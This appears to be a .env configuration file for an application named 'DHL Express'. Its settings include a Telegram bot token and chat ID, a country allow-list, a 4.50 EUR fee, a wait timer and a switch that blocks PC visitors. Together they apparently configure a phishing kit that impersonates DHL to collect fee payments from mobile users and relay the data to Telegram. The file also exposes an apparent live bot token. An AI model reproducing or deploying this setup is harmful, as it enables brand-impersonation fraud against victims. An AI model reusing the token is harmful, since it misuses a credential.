# DHL Express - Environment Configuration
# ==========================================
# IMPORTANT: Keep this file PRIVATE and NEVER commit to Git!
# Add .env to .gitignore file

# Telegram Bot Configuration
TELEGRAM_BOT_TOKEN=6323225325:AAHnHvx5H8qP9kZtBRWq2OPQ2fEnAwUjrlM
TELEGRAM_CHAT_ID=-5032863139

# Application Settings
ALLOWED_COUNTRIES=PL,SA,AE,QA,KW,BH,OM,IL,BE
APP_NAME=DHL Express
APP_FEE=4.50
APP_CURRENCY=EUR
SECONDS_WAIT=20

# Device Restrictions (on/off)
BLOCK_PC=on

# Security Settings
ENABLE_LOGGING=on
ENABLE_RATE_LIMIT=on
MAX_ATTEMPTS=10
RATE_LIMIT_WINDOW=300

# Database (optional - for future use)
# DB_HOST=localhost
# DB_USER=root
# DB_PASS=password
# DB_NAME=dhl_express

# Email Notifications (optional - for future use)
# MAIL_HOST=smtp.gmail.com
# MAIL_PORT=587
# MAIL_USER=your-email@gmail.com
# MAIL_PASS=your-app-password

# Debug Mode (true/false)
DEBUG=false
